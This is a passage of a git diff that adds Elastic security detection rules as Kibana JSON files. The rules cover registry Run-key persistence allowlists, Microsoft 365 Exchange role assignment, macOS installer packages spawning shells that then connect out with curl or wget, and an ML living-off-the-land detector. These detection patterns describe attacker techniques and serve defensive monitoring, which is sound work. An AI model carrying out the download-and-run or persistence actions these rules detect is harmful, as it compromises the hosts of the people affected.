\"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "97fc44d3-8dae-4019-ae83-298c3015600f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json new file mode 100644 index 00000000000..db733711642 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json new file mode 100644 index 00000000000..765153bf251 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json new file mode 100644 index 00000000000..38334d6e4a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json new file mode 100644 index 00000000000..a44da2f8ee3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package.", + "false_positives": [ + "Custom organization-specific macOS packages that use .pkg files to run cURL could trigger this rule. If known behavior is causing false positives, it can be excluded from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MacOS Installer Package Spawns Network Event", + "query": "sequence by host.id, user.id with maxspan=30s\n[process where host.os.type == \"macos\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name : (\"installer\", \"package_script_service\") and process.name : (\"bash\", \"sh\", \"zsh\", \"python\", \"osascript\", \"tclsh*\")]\n[network where host.os.type == \"macos\" and event.type == \"start\" and process.name : (\"curl\", \"osascript\", \"wget\", \"python\")]\n", + "references": [ + "https://redcanary.com/blog/clipping-silver-sparrows-wings", + "https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520", + "https://github.com/D00MFist/Mystikal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "99239e7d-b0d4-46e3-8609-acafcf99f68c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "99239e7d-b0d4-46e3-8609-acafcf99f68c_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json new file mode 100644 index 00000000000..e71889eadd0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score", + "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction_probability", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "994e40aa-8c85-43de-825e-15f665375ee8", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "994e40aa-8c85-43de-825e-15f665375ee8_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json new file mode 100644 index 00000000000..e25e44287e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score", + "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction_probability", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "994e40aa-8c85-43de-825e-15f665375ee8", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "994e40aa-8c85-43de-825e-15f665375ee8_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json new file mode 100644 index 00000000000..022c4106449 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json @@ 